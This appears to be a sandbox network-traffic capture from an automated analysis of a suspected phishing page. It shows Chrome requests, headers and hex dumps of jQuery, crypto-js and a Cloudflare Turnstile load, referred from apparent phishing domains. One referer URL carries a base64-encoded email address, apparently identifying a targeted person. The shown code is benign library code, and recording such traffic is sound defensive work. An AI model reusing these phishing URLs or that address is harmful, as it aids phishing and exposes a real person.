                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:10 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 15 Jan 2025 21:50:10 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2025-01-15 21:50:10 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.849725151.101.2.1374434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:11 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                    Host: code.jquery.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:11 UTC613INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    Content-Length: 89501
                                                                    Server: nginx
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                    ETag: "28feccc0-15d9d"
                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                    Access-Control-Allow-Origin: *
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                    Accept-Ranges: bytes
                                                                    Date: Wed, 15 Jan 2025 21:50:11 GMT
                                                                    Age: 2462338
                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740058-EWR
                                                                    X-Cache: HIT, HIT
                                                                    X-Cache-Hits: 2774, 4
                                                                    X-Timer: S1736977812.790383,VS0,VE0
                                                                    Vary: Accept-Encoding
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                    2025-01-15 21:50:11 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.849724104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:11 UTC647OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:11 UTC386INHTTP/1.1 302 Found
                                                                    Date: Wed, 15 Jan 2025 21:50:11 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                    cross-origin-resource-policy: cross-origin
                                                                    location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029147bdb9a1921-EWR
                                                                    alt-svc: h3=":443"; ma=86400


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.849727104.17.25.144434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:11 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                    Host: cdnjs.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:11 UTC958INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:11 GMT
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Cache-Control: public, max-age=30672000
                                                                    ETag: W/"61182885-40eb"
                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                    cf-cdnjs-via: cfworker/kv
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Timing-Allow-Origin: *
                                                                    X-Content-Type-Options: nosniff
                                                                    CF-Cache-Status: HIT
                                                                    Age: 635622
                                                                    Expires: Mon, 05 Jan 2026 21:50:11 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4UvvZIx3Sk4f1T9RlSIHlzmzhs6XnOLxT2U8t0ZcIdrUyR9zfyr97jVxCEQH%2B5iX9HKlyit1tD06wlRPK8c93829Mt9v93Iu%2FMHmcYQGZ6lMwtXVHLz8DMBc0AhFNcgYywNMF%2Bj"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                    Strict-Transport-Security: max-age=15780000
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029147c0bb9c343-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:11 UTC411INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                    Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                    Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                    Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
